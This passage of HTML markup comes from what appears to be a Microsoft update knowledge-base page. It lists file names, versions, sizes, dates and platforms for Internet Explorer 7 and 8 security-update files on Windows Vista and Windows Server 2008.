class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">53,760</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">53,760</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">6,119,424</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">180,736</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">6,120,960</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">180,736</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieinstal.exe</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">282,624</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieinstal.exe</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">282,624</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">304,128</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">304,128</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr></table></div><h3 class=\"sbody-h3\">Internet Explorer 8</h3><h4 class=\"sbody-h4\">Internet Explorer 8 on all supported 32-bit versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">1,213,440</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,216,000</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">611,840</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">611,840</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">1,469,440</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,469,440</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.19507</td><td class=\"sbody-td\">18,944</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.23569</td><td class=\"sbody-td\">18,944</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">916,992</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">920,064</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.19507</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.23569</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">184,320</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">184,320</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">43,520</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">43,520</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">743,424</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">743,424</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">630,272</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:01</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">630,272</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:32</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">55,296</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,938</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:01</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedssync.exe</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">13,312</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">55,296</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,938</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:32</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedssync.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">13,312</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:53</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.19507</td><td class=\"sbody-td\">385,024</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:45</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.23569</td><td class=\"sbody-td\">385,024</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:00</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">67,072</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">67,072</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">6,020,608</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:38</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">6,022,144</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:53</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">247,808</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">247,808</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">198,144</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">198,144</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">133,632</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">638,120</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:45</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:00</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:00</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:00</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:00</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">133,632</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:53</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">638,120</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:31</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:31</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:31</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:31</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">522,240</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">522,240</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Desktop.ini</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">65</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">00:59</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">206,848</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Desktop.ini</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">65</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:31</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">206,848</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">2,005,504</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6001.19507</td><td class=\"sbody-td\">129,536</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">2,006,016</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6001.23569</td><td class=\"sbody-td\">129,536</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">174,080</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">55,808</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">174,592</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:53</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">55,808</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">109,056</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">109,056</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">759,296</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">759,296</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">105,984</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">105,984</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">11,111,424</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">164,352</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">11,113,472</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">164,352</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieinstal.exe</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">376,320</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieinstal.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">376,320</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:53</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 8 on all supported x64-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">1,490,432</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,494,016</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">1,062,912</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,062,912</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td 